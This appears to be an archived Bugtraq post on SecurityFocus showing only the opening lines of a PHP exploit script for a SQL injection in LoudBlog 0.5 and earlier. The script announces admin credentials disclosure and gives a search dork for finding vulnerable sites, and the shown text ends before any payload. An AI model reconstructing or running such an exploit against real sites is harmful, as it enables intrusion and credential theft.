Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
LoudBlog <=0.5 Sql injection Jul 20 2006 10:29PM
rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on

<?

echo "LoudBlog <= 0.5 'id' SQL injection / admin credentials disclosure\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n";

echo "a dork: \"Powered by LoudBlog\"\r\n\r\n";

/*

works regardless of magic_quotes_g...

[ more ]  




 

Privacy Statement
Copyright 2009, SecurityFocus